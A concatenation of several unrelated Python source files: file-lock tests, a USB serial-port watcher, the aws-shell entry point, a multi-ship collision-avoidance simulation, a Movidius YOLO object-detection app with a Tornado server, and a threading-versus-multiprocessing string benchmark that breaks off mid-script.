p1_pid = q1.get()
q2.put(p2_pid)
# set up lock
lock = lk.Lock(lock_path, debug=True)
# p1 takes write lock and writes pid/host to file
barrier.wait() # ---------------------------------------- 1
# verify that p1 wrote information to lock file
with lk.ReadTransaction(lock):
assert lock.pid == p1_pid
assert lock.host == host
barrier.wait() # ---------------------------------------- 2
# take a write lock on the file and verify pid/host info
with lk.WriteTransaction(lock):
assert lock.old_pid == p1_pid
assert lock.old_host == host
assert lock.pid == p2_pid
assert lock.host == host
barrier.wait() # ------------------------------------ 3
# wait for p1 to verify pid/host info
barrier.wait() # ---------------------------------------- 4
q1, q2 = Queue(), Queue()
local_multiproc_test(p2, p1, extra_args=(q1, q2))
def test_lock_with_no_parent_directory(tmpdir):
"""Make sure locks work even when their parent directory does not exist."""
with tmpdir.as_cwd():
lock = lk.Lock('foo/bar/baz/lockfile')
with lk.WriteTransaction(lock):
pass
def test_lock_in_current_directory(tmpdir):
"""Make sure locks work even when their parent directory does not exist."""
with tmpdir.as_cwd():
# test we can create a lock in the current directory
lock = lk.Lock('lockfile')
for i in range(10):
with lk.ReadTransaction(lock):
pass
with lk.WriteTransaction(lock):
pass
# and that we can do the same thing after it's already there
lock = lk.Lock('lockfile')
for i in range(10):
with lk.ReadTransaction(lock):
pass
with lk.WriteTransaction(lock):
pass
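# Minimal usage sketch (not one of the tests above) of the lock API these tests
# exercise; the lock file name below is a hypothetical placeholder.
def example_lock_usage(path='example.lock'):
    lock = lk.Lock(path)
    # low-level API: take a shared read lock, upgrade to an exclusive write lock,
    # then release both (write and read are released separately)
    lock.acquire_read()
    lock.acquire_write()
    lock.release_write()
    lock.release_read()
    # transaction helpers acquire on enter and release on exit
    with lk.ReadTransaction(lock):
        pass  # read-only critical section
    with lk.WriteTransaction(lock):
        pass  # exclusive critical section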
|
usbportwatcher.py
|
# Loops in a background thread looking for USB devices on serial ports. Maintains a list of connected ports.
import os
import threading
import json
from time import sleep
from eventsmanager import EventsManager
class USBPortWatcher():
def __init__(self):
self.em = EventsManager()
self.connectedUSBPorts = []
self.watchUSB()
def getUSBPorts(self):
return self.connectedUSBPorts
def _watchUSB(self):
prev_usb_ports = []
while True:
# get list of usb ports with connections
if os.path.exists('/dev/'):
all_ports = os.listdir('/dev')
else:
all_ports = []
usb_ports = [port_name for port_name in all_ports if (port_name.startswith('ttyUSB') or port_name.startswith('ttyACM'))]
# look for new usb connections
for short_port_name in usb_ports:
                if short_port_name not in prev_usb_ports:
port = '/dev/' + short_port_name
print("USBWatcher: New device found on port", port)
self.em.publish("usb-connect", {"port":port})
# look for usb disconnections
for short_port_name in prev_usb_ports:
                if short_port_name not in usb_ports:
port = '/dev/' + short_port_name
print("USBWatcher: Device removed from port", port)
self.em.publish("usb-disconnect", {"port":port})
# save list for next pass around
prev_usb_ports = usb_ports
self.connectedUSBPorts = usb_ports
sleep(.2)
def watchUSB(self):
t = threading.Thread(target=self._watchUSB)
t.start()
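# Illustrative usage (not part of the original module): the watcher runs in its own
# thread, publishes "usb-connect"/"usb-disconnect" events through EventsManager, and
# exposes the current port list via getUSBPorts().
if __name__ == '__main__':
    watcher = USBPortWatcher()
    while True:
        print("Connected USB serial ports:", watcher.getUSBPorts())
        sleep(1)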
|
__init__.py
|
from __future__ import unicode_literals, print_function
import json
import argparse
import threading
from awsshell import shellcomplete
from awsshell import autocomplete
from awsshell import app
from awsshell import docs
from awsshell import loaders
from awsshell.index import completion
from awsshell import utils
__version__ = '0.2.0'
def determine_doc_index_filename():
import awscli
base = loaders.JSONIndexLoader.index_filename(
awscli.__version__)
return base + '.docs'
def load_index(filename):
load = loaders.JSONIndexLoader()
return load.load_index(filename)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--profile', help='The profile name to use '
'when starting the AWS Shell.')
args = parser.parse_args()
indexer = completion.CompletionIndex()
try:
index_str = indexer.load_index(utils.AWSCLI_VERSION)
index_data = json.loads(index_str)
except completion.IndexLoadError:
print("First run, creating autocomplete index...")
from awsshell.makeindex import write_index
# TODO: Using internal method, but this will eventually
# be moved into the CompletionIndex class anyways.
index_file = indexer._filename_for_version(utils.AWSCLI_VERSION)
write_index(index_file)
index_str = indexer.load_index(utils.AWSCLI_VERSION)
index_data = json.loads(index_str)
doc_index_file = determine_doc_index_filename()
from awsshell.makeindex import write_doc_index
doc_data = docs.load_lazy_doc_index(doc_index_file)
# There's room for improvement here. If the docs didn't finish
# generating, we regen the whole doc index. Ideally we pick up
# from where we left off.
try:
docs.load_doc_db(doc_index_file)['__complete__']
except KeyError:
print("Creating doc index in the background. "
"It will be a few minutes before all documentation is "
"available.")
t = threading.Thread(target=write_doc_index, args=(doc_index_file,))
t.daemon = True
t.start()
model_completer = autocomplete.AWSCLIModelCompleter(index_data)
completer = shellcomplete.AWSShellCompleter(model_completer)
shell = app.create_aws_shell(completer, model_completer, doc_data)
if args.profile:
shell.profile = args.profile
shell.run()
if __name__ == '__main__':
main()
|
SimVM.py
|
#-------------------------------------------------------------------------------
# Name: SimVM
# Purpose:     Implements a thread-safe simulation environment containing several autonomously navigating ships, observers, and environment data
#
# Author: Youan
# Helper: Bruce
# Created: 27-01-2020
# Copyright: (c) Youan 2020
# Licence: <your licence>
#-------------------------------------------------------------------------------
import math, random, time, copy, uuid, threading
import CPA, TransBCD, DrawVoAreas, opt_db, opt_redis
import HumanActivity as HA
class SimShip:
    # Simulated-ship decision class; performs one decision step at a time
def __init__(self, SimVMID, ShipID, Tick = 0, Lon = 0.0, Lat = 0.0, Speed = 0.0, Heading = 0.0, TimeRatio = 10):
# super().__init__(self, SimShipRegistered)
        self.VMid = SimVMID # owning virtual machine
        self.id = ShipID # ship ID
        self.lon = Lon # ship longitude
        self.lat = Lat # ship latitude
        self.speed = Speed # ship speed, m/s
        self.heading = Heading # heading in degrees; 0 is due north, positive clockwise
        self.interval = TimeRatio # time interval covered by one discrete step
        self.tick = Tick # current virtual clock
self.VOImgID = None
pass
def __RunOneStep(self):
# time.sleep(0.1)
        # A method whose name starts with "__" is name-mangled, so it is intended for use inside this class only
        # Simplified calculation; a proper treatment would need navigation formulas
        # lon, lat: starting coordinates
        # speed: ship speed; unit conversion still pending, initially in m/s
        # heading: course angle, measured clockwise from due north to the course line
        # distance: distance travelled by the ship during this step, initially in meters
        # math.radians() converts degrees to radians
        # returns: the new coordinate point
        distance = self.speed * self.interval # in meters
# xx = self.lon + distance * math.sin(math.radians(self.heading))
# yy = self.lat + distance * math.cos(math.radians(self.heading))
x_com = distance * math.sin(math.radians(self.heading))
y_com = distance * math.cos(math.radians(self.heading))
xx = TransBCD.DeltaMeter2DeltaLon(x_com, self.lat)
yy = TransBCD.DeltaMeter2DeltaLat(y_com)
x = self.lon + xx
y = self.lat + yy
        # heading and speed remain unchanged
# print(self.lon, self.lat, self.speed, self.heading, distance, xx, yy)
return x, y
def __TurnLeft(self):
# time.sleep(0.1)
        distance = self.speed * self.interval # in meters
# xx = self.lon + distance * math.sin(math.radians(self.heading - 5))
# yy = self.lat + distance * math.cos(math.radians(self.heading - 5))
x_com = distance * math.sin(math.radians(self.heading - 10))
y_com = distance * math.cos(math.radians(self.heading - 10))
xx = TransBCD.DeltaMeter2DeltaLon(x_com, self.lat)
yy = TransBCD.DeltaMeter2DeltaLat(y_com)
x = self.lon + xx
y = self.lat + yy
        # TODO: call a ship dynamics model to compute the ship's position and other state information
return x, y
pass
def __TurnRight(self):
# time.sleep(0.1)
        distance = self.speed * self.interval # in meters
# xx = self.lon + distance * math.sin(math.radians(self.heading + 5))
# yy = self.lat + distance * math.cos(math.radians(self.heading + 5))
x_com = distance * math.sin(math.radians(self.heading + 10))
y_com = distance * math.cos(math.radians(self.heading + 10))
xx = TransBCD.DeltaMeter2DeltaLon(x_com, self.lat)
yy = TransBCD.DeltaMeter2DeltaLat(y_com)
x = self.lon + xx
y = self.lat + yy
        # TODO: call a ship dynamics model to compute the ship's position and other state information
return x, y
pass
def DecitionCore(self, func):
self.lon, self.lat = func()
self.tick = self.tick + self.interval
def RunOneDecision(self, RunFlag):
        if self.id == '10086': # currently only the own ship makes decisions
if RunFlag == 2:
self.DecitionCore(self.__TurnLeft)
# print('\nFlag2 This Ship.time: ', self.tick)
                # TODO: decide whether the heading needs correcting afterwards; it is currently corrected automatically in the turning functions
elif RunFlag == 3:
self.DecitionCore(self.__TurnRight)
                # TODO: decide whether the heading needs correcting afterwards; it is currently corrected automatically in the turning functions
else:
self.DecitionCore(self.__RunOneStep)
else:
self.DecitionCore(self.__RunOneStep)
pass
def GetShipStatus(self):
        shipStatus = {} # create an empty dict
shipStatus['time'] = self.tick
shipStatus['VMid'] = self.VMid
shipStatus['shipid'] = self.id
shipStatus['lon'] = self.lon
shipStatus['lat'] = self.lat
shipStatus['speed'] = self.speed
shipStatus['heading'] = self.heading
shipStatus['interval'] = self.interval
shipStatus['VOImgID'] = self.VOImgID
return shipStatus
class SimVM:
# SimShipRegistered = []
# __Times = 10
# __GoHead = True
    # __RunFlag = 0 # test decision flag
    # __METFlag = 0 # whether the ships have already met; once they meet, this VM stops running
# __SimData = []
# __NextStepData = {}
def __init__(self, id, interval = 0.5, timeratio = 10):
        # List of ships registered in this virtual machine
        # In-memory ShipStatus table; one per VM
        # Initialization parameters; the private attributes here could be made public
self.id = id # VMID
self.interval = interval
self.timeratio = timeratio
self.SimShipRegistered = []
self.__Times = 10
        self.__RunFlag = 0 # test decision flag
        self.__METFlag = 0 # whether the ships have already met; once they meet, this VM stops running
self.__SimData = []
self.__NextStepData = {}
        # Define and start the VM thread
def GetNextStepData(self):
return self.__NextStepData
def SetShipStatus(self, StatusData):
"""
        Restore ShipStatus from the given snapshot.
"""
StatusData = copy.deepcopy(StatusData)
i = 0
for ship in self.SimShipRegistered:
ship.__init__(
StatusData[i].get('VMid'),
StatusData[i].get('shipid'),
StatusData[i].get('time'),
StatusData[i].get('lon'),
StatusData[i].get('lat'),
StatusData[i].get('speed'),
StatusData[i].get('heading'),
StatusData[i].get('interval')
)
i += 1
pass
def GetMetFlag(self):
return self.__METFlag
def GetSimData(self):
# time.sleep(0.1)
return self.__SimData
def addShip(self, ShipID, Tick = 0, Lon = 0.0, Lat = 0.0, Speed = 0.0, Heading = 0.0):
        # register a ship
ship = SimShip(self.id, ShipID, Tick, Lon, Lat, Speed, Heading, self.timeratio)
self.SimShipRegistered.append(ship)
# SimShipRegistered.append(ship)
# def delShip(self, ship):
    # # unregister a ship by ship object
# self.SimShipRegistered.remove(ship)
# # SimShipRegistered.remove(ship)
# def delShip(self, shipid):
def delShip(self,):
        # unregister the ships belonging to this VM (the by-shipid variant is commented out below)
for ship in self.SimShipRegistered:
if ship.VMid == self.id:
self.SimShipRegistered.remove(ship)
# if ship.id == shipid:
# self.SimShipRegistered.remove(ship)
def RunOneTime(self, ):
for ship in self.SimShipRegistered:
ship.RunOneDecision(self.__RunFlag)
thisShipStatus = self.GetShipStatus()
# print("请注意下面进入决策引擎的数据和数量,正常情况列表中应该只有2条数据: ")
# print(thisShipStatus, '\n')
DeciResult = HA.ProbDeciEngie(thisShipStatus)
self.__SimData.append(self.GetShipStatus())
print("FLAG: ", DeciResult["FLAG"], "\n")
return DeciResult
def GetShipStatus(self):
# time.sleep(0.1)
foo = []
for ship in self.SimShipRegistered:
# for ship in SimShipRegistered:
# print(ship.GetShipStatus())
foo.append(ship.GetShipStatus())
return foo
pass
def StoreVOImgDataAndAddID2ShipStatus(self):
ShipStatus = self.GetShipStatus()
pos1 = [ShipStatus[0]['lon'], ShipStatus[0]['lat']]
heading1 = ShipStatus[0]['heading']
speed1 = ShipStatus[0]['speed']
pos2 = [ShipStatus[1]['lon'], ShipStatus[1]['lat']]
heading2 = ShipStatus[1]['heading']
speed2 = ShipStatus[1]['speed']
        # imgID is '11' concatenated with a 36-character uuid
imgID = '11' + str(uuid.uuid5(uuid.NAMESPACE_URL, str(time.time())))
b64ImgData = DrawVoAreas.GenVOImgB64(pos1, heading1, speed1, pos2, heading2, speed2, imgID)
        # Store the base64-encoded data in the database, one record per connection; needs optimization
        # TODO: optimize the database access
# opt_db.insert_into_voimg(imgID, self.id, b64ImgData)
opt_redis.insert_into_voimg(imgID, self.id, b64ImgData)
return imgID
def RunMultiTime(self):
self.__GoHead = True
        # self.__RunFlag = True # test decision flag
while self.__GoHead:
if self.__Times == 0:
self.__GoHead = False
if self.__Times > 0:
self.__Times = self.__Times - 1
if self.__GoHead:
                # Call the helper above to store the VO image data and get back the image ID
imgID = self.StoreVOImgDataAndAddID2ShipStatus()
                # Currently only the own ship makes decisions; both ships share the same VO image, so attach the VOImgID to every ship
                # This really belongs at the virtual-machine level, which is why it is handled here
for ship in self.SimShipRegistered:
                    ship.VOImgID = imgID # attach the VOImgID to each ship
                thisDeciResult = self.RunOneTime() # updated result
self.__METFlag = thisDeciResult["MET"]
if self.__METFlag == 1:
self.Stop()
print("Attention:船已汇遇,当前虚拟机{}已经停止运行!\n".format(self.id))
else:
self.__RunFlag = thisDeciResult["FLAG"]
                    # self.__RunFlag, DeciProb = self.RunOneTime() # original version
if thisDeciResult["FLAG"] == 1:
self.Stop()
self.NextStep(thisDeciResult)
def NextStep(self, DeciProb):
"""
        System decision step: produce the next-step result for each probability. Only
        single-ship (own-ship) decisions are supported for now. After assembly the result
        takes the form
        NextStepData = {
            "GoHead": {"prob": prob1, "status": ShipStatus1},
            "TurnLeft": {"prob": prob2, "status": ShipStatus2},
            "TurnRight": {"prob": prob3, "status": ShipStatus3}
        }
        and is stored as self.__NextStepData.
        Input parameter format:
        DeciProb = {
            "FLAG": FLAG,
            "GoHead": GH,
            "TurnLeft": TL,
            "TurnRight": TR
        }
        where GH, TL and TR are probability values; FLAG is always 1 by the time it reaches here and is no longer used.
"""
DeciProb = copy.deepcopy(DeciProb)
OldShipStatus = copy.deepcopy(self.GetShipStatus()) # ShipStatus
# print('\nOldShipData: ', OldShipStatus)
ShipStatus2 = self.RunNextStep(2)
# TurnLeft = {"probability": DeciProb.get("TurnLeft"), "status": ShipStatus2}
TurnLeft = {"probability": DeciProb.get("TurnLeft"), "status": OldShipStatus + ShipStatus2}
# print('\nTurnLeft: ', TurnLeft)
self.SetShipStatus(OldShipStatus)
ShipStatus1 = self.RunNextStep(1)
# GoHead = {"probability": DeciProb["GoHead"], "status": ShipStatus1}
GoHead = {"probability": DeciProb["GoHead"], "status": OldShipStatus + ShipStatus1}
# print('Prob: ', DeciProb["GoHead"])
# print('\nGoHead: ', GoHead)
        self.SetShipStatus(OldShipStatus) # restore shipStatus
ShipStatus3 = self.RunNextStep(3)
# TurnRight = {"probability": DeciProb.get("TurnRight"), "status": ShipStatus3}
TurnRight = {"probability": DeciProb.get("TurnRight"), "status": OldShipStatus + ShipStatus3}
# print('\nTurnRight: ', TurnRight)
self.SetShipStatus(OldShipStatus)
# print('\nAfterTurnRight ShipStatus: ', self.GetShipStatus())
NextStepData = {
"TurnLeft": TurnLeft,
"GoHead": GoHead,
"TurnRight": TurnRight
}
self.__NextStepData = copy.deepcopy(NextStepData)
pass
def RunNextStep(self, tempflag):
"""
        Functionally similar to RunOneTime but distinct: it runs a single isolated step to compute the next-step state for each candidate action independently.
"""
# ship1 = self.SimShipRegistered[0]
# ship2 = self.SimShipRegistered[1]
for ship in self.SimShipRegistered:
ship.RunOneDecision(tempflag)
SomeShipStatus = self.GetShipStatus()
# print('\nThis SomeShipStatus: ', SomeShipStatus)
return SomeShipStatus
pass
def Run(self, initStatus4DrawLines, Times = 0):
        self.__SimData.append(initStatus4DrawLines) # first append the end state of the previous simulation run to the status list
        # Call the helper above to store the VO image data and get back the image ID
        iimgID = self.StoreVOImgDataAndAddID2ShipStatus()
        # Currently only the own ship makes decisions; both ships share the same VO image, so attach the VOImgID to every ship
        # This really belongs at the virtual-machine level, which is why it is handled here
        for ship in self.SimShipRegistered:
            ship.VOImgID = iimgID # attach the VOImgID to each ship
        self.__SimData.append(self.GetShipStatus()) # then append the current start state to the status list
        # Start the VM thread; pass the bound method itself as target (calling it here would run the loop synchronously)
        self.__Times = Times
        self.__VMThread = threading.Thread(target=self.RunMultiTime)
        self.__VMThread.start()
        # for single-threaded testing, call RunMultiTime directly as below
# self.RunMultiTime()
def Stop(self):
self.__GoHead = False
# self.delShip()
pass
# This function is intended to be called from outside
def RunVM(initData, initStatus4DrawLines, interval = 0.2, timeRatio = 100, runTimes = -1):
"""
: initData: data that init ships in this VM, and initData looks like :
initData = {
ship0: {
ShipID: "10086",
Tick: 0,
Lon: 123,
Lat: 35,
Speed: 10,
Heading: 90
},
ship1: {ShipID: "10010", Tick: 0, Lon: 123.1, Lat: 35.01, Speed: 7, Heading: 90}
}
: interval = 0.2,
: timeRatio = 100,
: runTimes = -1 : running times, -1 to loop,
: return: VMData
"""
GenVMID = time.strftime("%y%m%d%H%M%S") + str(random.randint(1000, 9999))
print("VMID: ", GenVMID)
VM = SimVM(id = GenVMID, interval = interval, timeratio = timeRatio)
VM.addShip(
ShipID = initData["ship0"]["ShipID"],
Tick = initData["ship0"]["Tick"],
Lon = initData["ship0"]["Lon"],
Lat = initData["ship0"]["Lat"],
Speed = initData["ship0"]["Speed"],
Heading = initData["ship0"]["Heading"]
    ) # own ship
    VM.addShip(ShipID = initData["ship1"]["ShipID"], Tick = initData["ship1"]["Tick"], Lon = initData["ship1"]["Lon"], Lat = initData["ship1"]["Lat"], Speed = initData["ship1"]["Speed"], Heading = initData["ship1"]["Heading"]) # target ship (a passenger ship)
VM.Run(initStatus4DrawLines, runTimes)
# VMData = {"VMID": VM.id, "SimData": VM.GetSimData(), "NextStepData": VM.GetNextStepData(), "MET": VM.GetMetFlag()}
# print('\nVMData: ', VMData)
# return VMData
return VM
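# Illustrative call (not part of the original module); every value below is a
# hypothetical placeholder. initStatus4DrawLines would normally be the final
# GetShipStatus() snapshot of the previous simulation run.
def _example_run_vm():
    example_init = {
        "ship0": {"ShipID": "10086", "Tick": 0, "Lon": 123.0, "Lat": 35.0, "Speed": 10, "Heading": 90},
        "ship1": {"ShipID": "10010", "Tick": 0, "Lon": 123.1, "Lat": 35.01, "Speed": 7, "Heading": 90}
    }
    return RunVM(example_init, initStatus4DrawLines=[], interval=0.2, timeRatio=100, runTimes=8)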
# This function is used for internal testing
def SimTest():
GenVMID = time.strftime("%y%m%d%H%M%S") + str(random.randint(1000, 9999))
print("VMID: ", GenVMID)
VM = SimVM(id = GenVMID, interval = 0.2, timeratio = 100)
    VM.addShip(ShipID='10086', Lon=123, Lat=35.01, Speed=10, Heading=135) # own ship
    VM.addShip(ShipID='10010', Lon=123.1, Lat=35, Speed=7, Heading=270) # target ship (a passenger ship)
    VM.Run([], Times = 8) # Run expects (initStatus4DrawLines, Times); pass an empty start-state list and 8 iterations
VMData = {"VMID": VM.id, "SimData": VM.GetSimData(), "NextStepData": VM.GetNextStepData(), "MET": VM.GetMetFlag()}
print('\nVMData: ', VMData)
# In-memory ShipStatus table; one per VM
# SimItemRegistered = []
# SimShipRegistered = []
# class SimItem(object):
# # Base class for simulation entities; implements register and unregister
# def __init__(self, RegisteredList = SimItemRegistered):
# __RegisterList = RegisteredList
# def Register():
# __RegisterList.append(self)
# pass
# def unRegister():
# __RegisterList.remove(self)
# pass
# def RunOneDecision():
# pass
# def main():
# SimTest()
# pass
# if __name__ == '__main__':
# main()
|
object_detection_app.py
|
import os,os.path,time,cv2,argparse,multiprocessing,threading,asyncio
import numpy as np
import tornado.ioloop
import tornado.web
import tornado.autoreload
from mvnc import mvncapi as mvnc
from skimage.transform import resize
from utils.app_utils import FPS, WebcamVideoStream
from multiprocessing import Queue, Pool
from picamera import PiCamera
classes = ["aeroplane", "bicycle", "bird", "boat", "bottle", "bus", "car", "cat", "chair", "cow", "diningtable", "dog", "horse", "motorbike", "person", "pottedplant", "sheep", "sofa", "train","tvmonitor"]
dim=(448,448)
threshold = 0.2
iou_threshold = 0.5
num_class = 20
num_box = 2
grid_size = 7
#Declaration for custom frame.png saving
path = '/home/pi/workspace/ncsdk/examples/apps/yoloNCS/py_examples/Tornado/templates/static'
#Following lines for Tornado Websocket
#Write to screen
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.render('templates/static/index.html')
#This tells Tornado where to find static file
settings = dict(
template_path = os.path.join(os.path.dirname(__file__), "Tornado"),
static_path = os.path.join(os.path.dirname(__file__), "Tornado/templates/static"),
debug = True
)
# r"/" == root websit address
def start_tornado(*args, **kwargs):
asyncio.set_event_loop(asyncio.new_event_loop())
application = tornado.web.Application([
(r"/", MainHandler),
(r'/static/(.*)', tornado.web.StaticFileHandler, {'path': 'static/'})
], **settings, gzip = True)
application.listen(7777)
print("Launching Tornado")
tornado.ioloop.IOLoop.instance().start()
print("Launch Completed\n")
def show_results(img, results, img_width, img_height):
img_cp = img
disp_console = False
imshow = True
for i in range(len(results)):
x = int(results[i][1])
y = int(results[i][2])
w = int(results[i][3])//2
h = int(results[i][4])//2
if disp_console : print (' class : ' + results[i][0] + ' , [x,y,w,h]=[' + str(x) + ',' + str(y) + ',' + str(int(results[i][3])) + ',' + str(int(results[i][4]))+'], Confidence = ' + str(results[i][5]) )
xmin = x-w
xmax = x+w
ymin = y-h
ymax = y+h
if xmin<0:
xmin = 0
if ymin<0:
ymin = 0
if xmax>img_width:
xmax = img_width
if ymax>img_height:
ymax = img_height
if imshow:
cv2.rectangle(img_cp,(xmin,ymin),(xmax,ymax),(0,255,0),2)
#print ((xmin, ymin, xmax, ymax))
cv2.rectangle(img_cp,(xmin,ymin-20),(xmax,ymin),(125,125,125),-1)
cv2.putText(img_cp,results[i][0] + ' : %.2f' % results[i][5],(xmin+5,ymin-7),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,0,0),1)
#
cv2.imshow('YOLO detection',img_cp)
def interpret_output(output, img_width, img_height):
w_img = img_width
h_img = img_height
probs = np.zeros((7,7,2,20))
class_probs = (np.reshape(output[0:980],(7,7,20)))
#print(class_probs)
scales = (np.reshape(output[980:1078],(7,7,2)))
#print(scales)
boxes = (np.reshape(output[1078:],(7,7,2,4)))
offset = np.transpose(np.reshape(np.array([np.arange(7)]*14),(2,7,7)),(1,2,0))
#boxes.setflags(write=1)
boxes[:,:,:,0] += offset
boxes[:,:,:,1] += np.transpose(offset,(1,0,2))
boxes[:,:,:,0:2] = boxes[:,:,:,0:2] / 7.0
boxes[:,:,:,2] = np.multiply(boxes[:,:,:,2],boxes[:,:,:,2])
boxes[:,:,:,3] = np.multiply(boxes[:,:,:,3],boxes[:,:,:,3])
boxes[:,:,:,0] *= w_img
boxes[:,:,:,1] *= h_img
boxes[:,:,:,2] *= w_img
boxes[:,:,:,3] *= h_img
for i in range(2):
for j in range(20):
probs[:,:,i,j] = np.multiply(class_probs[:,:,j],scales[:,:,i])
#print (probs)
filter_mat_probs = np.array(probs>=threshold,dtype='bool')
filter_mat_boxes = np.nonzero(filter_mat_probs)
boxes_filtered = boxes[filter_mat_boxes[0],filter_mat_boxes[1],filter_mat_boxes[2]]
probs_filtered = probs[filter_mat_probs]
classes_num_filtered = np.argmax(probs,axis=3)[filter_mat_boxes[0],filter_mat_boxes[1],filter_mat_boxes[2]]
argsort = np.array(np.argsort(probs_filtered))[::-1]
boxes_filtered = boxes_filtered[argsort]
probs_filtered = probs_filtered[argsort]
classes_num_filtered = classes_num_filtered[argsort]
for i in range(len(boxes_filtered)):
if probs_filtered[i] == 0 : continue
for j in range(i+1,len(boxes_filtered)):
if iou(boxes_filtered[i],boxes_filtered[j]) > iou_threshold :
probs_filtered[j] = 0.0
filter_iou = np.array(probs_filtered>0.0,dtype='bool')
boxes_filtered = boxes_filtered[filter_iou]
probs_filtered = probs_filtered[filter_iou]
classes_num_filtered = classes_num_filtered[filter_iou]
result = []
for i in range(len(boxes_filtered)):
result.append([classes[classes_num_filtered[i]],boxes_filtered[i][0],boxes_filtered[i][1],boxes_filtered[i][2],boxes_filtered[i][3],probs_filtered[i]])
return result
def iou(box1,box2):
tb = min(box1[0]+0.5*box1[2],box2[0]+0.5*box2[2])-max(box1[0]-0.5*box1[2],box2[0]-0.5*box2[2])
lr = min(box1[1]+0.5*box1[3],box2[1]+0.5*box2[3])-max(box1[1]-0.5*box1[3],box2[1]-0.5*box2[3])
if tb < 0 or lr < 0 : intersection = 0
else : intersection = tb*lr
return intersection / (box1[2]*box1[3] + box2[2]*box2[3] - intersection)
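# Quick sanity check for iou() (illustrative, not part of the original app).
def _iou_sanity_check():
    # Boxes are [x_center, y_center, w, h]; two 20x20 boxes offset by (5, 5)
    # overlap in a 15x15 region, so IoU = 225 / (400 + 400 - 225) ~= 0.391.
    assert abs(iou([50, 50, 20, 20], [55, 55, 20, 20]) - 225.0 / 575.0) < 1e-6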
def worker(graph, input_q, output_q):
fps = FPS().start()
while True:
fps.update()
frame = input_q.get()
graph.LoadTensor(resize(frame/255.0,dim,1)[:,:,(2,1,0)].astype(np.float16), 'user object')
out, userobj = graph.GetResult()
results = interpret_output(out.astype(np.float32), frame.shape[1], frame.shape[0])
#print(results)
try:
if results[0][0] == "car" or results[0][0] == "person" or results[0][0] == "aeroplane" or results[0][0] == "bottle":
print("Object detected! Attempting to capture image...")
try:
#Capture a frame and save it as png file
cv2.imwrite(os.path.join(path, 'frame.png'), frame)
print("Image captured!\n")
except:
print("Image capture FAILED!\n")
except:
print("NO RESULTS\n")
output_q.put((frame, results, frame.shape[1], frame.shape[0]))
#output_q.put((frame, [], frame.shape[1], frame.shape[0]))
#output_q.put(frame)
#
fps.stop()
if __name__ == '__main__':
#Starting a new thread for WebSocket
t = threading.Thread(target=start_tornado)
t.daemon = True
#Start server at port 7777
print(r'Server Running at http://localhost:' + "7777" + r'/')
print(r'To close press ctrl + c')
tornado.autoreload.start()
for dir, _, files in os.walk('static'):
[tornado.autoreload.watch(dir + '/' + f) for f in files if not f.startswith('.')]
t.start()
time.sleep(3)
parser = argparse.ArgumentParser()
parser.add_argument('-src', '--source', dest='video_source', type=int,
default=0, help='Device index of the camera.')
parser.add_argument('-wd', '--width', dest='width', type=int,
default=800, help='Width of the frames in the video stream.')
parser.add_argument('-ht', '--height', dest='height', type=int,
default=600, help='Height of the frames in the video stream.')
parser.add_argument('-num-w', '--num-workers', dest='num_workers', type=int,
default=2, help='Number of workers.')
parser.add_argument('-q-size', '--queue-size', dest='queue_size', type=int,
default=5, help='Size of the queue.')
args = parser.parse_args()
logger = multiprocessing.log_to_stderr()
logger.setLevel(multiprocessing.SUBDEBUG)
input_q = Queue(maxsize=args.queue_size)
output_q = Queue(maxsize=args.queue_size)
# configuration NCS
network_blob = 'graph'
mvnc.SetGlobalOption(mvnc.GlobalOption.LOG_LEVEL, 2)
devices = mvnc.EnumerateDevices()
if len(devices) == 0:
print('No devices found')
quit()
device = mvnc.Device(devices[0])
device.OpenDevice()
opt = device.GetDeviceOption(mvnc.DeviceOption.OPTIMISATION_LIST)
# load blob
with open(network_blob, mode='rb') as f:
blob = f.read()
graph = device.AllocateGraph(blob)
graph.SetGraphOption(mvnc.GraphOption.ITERATIONS, 1)
iterations = graph.GetGraphOption(mvnc.GraphOption.ITERATIONS)
#
pool = Pool(args.num_workers, worker, (graph, input_q, output_q))
#
video_capture = WebcamVideoStream(src=args.video_source,
width=args.width,
height=args.height).start()
fps = FPS().start()
#
while True: # fps._numFrames < 120
frame = video_capture.read()
input_q.put(frame)
t = time.time()
(img, results, img_width, img_height) = output_q.get()
show_results(img, results, img_width, img_height)
#cv2.imshow('Video', output_q.get())
#cv2.imshow('Video', output_q.get())
fps.update()
fps.stop()
print('[INFO] elapsed time: {:.2f}'.format(time.time() - t))
print('[INFO] fps.elapsed: {:.2f}'.format(fps.elapsed()))
print('[INFO] FPS: {:.2f}'.format(fps.fps()))
if cv2.waitKey(1) & 0xFF == ord('q'):
break
fps.stop()
print('[INFO] elapsed time (total): {:.2f}'.format(fps.elapsed()))
print('[INFO] approx. FPS: {:.2f}'.format(fps.fps()))
pool.terminate()
video_capture.stop()
cv2.destroyAllWindows()
graph.DeallocateGraph()
device.CloseDevice()
|
benchmark03_string_operations.py
|
#!/usr/bin/python
import os
import threading
import time
from multiprocessing import Pool
NUM_ITERATIONS = 200000
NUM_TASKS = 50
my_list = []
def prepare_data():
for c in xrange(0x30, 0x79, 3):
my_list.append(chr(c) + chr(c+1) + chr(c+2))
def my_function1(index, out_value):
result = []
for counter in xrange(0, NUM_ITERATIONS):
output_item = ''
for item in my_list:
output_item += item
result.append(output_item)
out_value[index] = result
def my_function2():
result = []
for counter in xrange(0, NUM_ITERATIONS):
output_item = ''
for item in my_list:
output_item += item
result.append(output_item)
return result
def my_function3(index, out_value):
result = []
for counter in xrange(0, NUM_ITERATIONS):
result.append(''.join(my_list))
out_value[index] = result
def my_function4():
result = []
for counter in xrange(0, NUM_ITERATIONS):
result.append(''.join(my_list))
return result
if __name__ == '__main__':
print ("Running: %s" % os.path.basename(__file__))
prepare_data()
results = {}
jobs = [threading.Thread(target=my_function1, kwargs=dict(index=i, out_value=results))
for i in xrange(NUM_TASKS)]
start_time = time.time()
[t.start() for t in jobs]
[t.join() for t in jobs]
end_time = time.time()
execution_time = end_time - start_time
print ("Execution time(concatenation using threading): %f\n" % execution_time)
# print ("Output: %s\n" % results.values())
del results
pool = Pool(processes=4)
start_time = time.time()
results = [pool.apply_async(my_function2) for p in xrange(NUM_TASKS)]
pool.close()
pool.join()
end_time = time.time()
execution_time = end_time - start_time
print ("Execution time(concatenation using multiprocessing.Pool): %f\n" % execution_time)
# print ("Output: %s\n" % [x.get() for x in results])
results = {}
jobs = [threading.Thread(target=my_function3, kwargs=dict(index=i, out_value=results))
for i in xrange(NUM_TASKS)]
start_time = time.time()
[t.start() for t in jobs]
[t.join() for t in jobs]
end_time = time.time()
